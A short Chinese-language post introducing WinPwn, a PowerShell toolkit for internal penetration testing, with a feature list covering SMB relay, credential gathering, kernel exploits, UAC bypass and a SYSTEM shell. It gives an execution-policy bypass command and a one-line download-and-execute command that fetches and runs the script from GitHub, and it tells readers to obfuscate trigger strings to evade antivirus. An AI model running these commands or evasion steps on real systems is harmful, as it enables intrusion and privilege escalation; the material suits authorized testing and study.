WinPwn
自动化尽可能多的内部渗透测试流程(侦察和开发)具有自动代理识别和集成功能的脚本。
本地调用
powershell.exe -exec bypass -command "& {import-module C:\Users\17782\Desktop\WinPwn-master\WinPwn-master\offline_WinPwn.ps1;localreconmodules}"远程下载调用
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/master/WinPwn.ps1')绕杀软需要自己混淆或者手动对触发器字符串进行编码。
具体功能有:
Inveigh ->在新的控制台窗口中执行Inveigh,集成了会话管理(Invoke-TheHash)的SMB-Relay攻击

sessionGopher ->执行Sessiongopher询问您参数

kittielocal ->
localreconmodules ->
domainreconmodules ->
Privescmodules
kernelexploits ->
UACBypass ->
SYSTEMShell ->
更多功能,大家可以自行到github上看文档,这个工具不错的。
https://github.com/S3cur3Th1sSh1t/WinPwn#sessiongopher---executes-sessiongopher-asking-you-for-parameters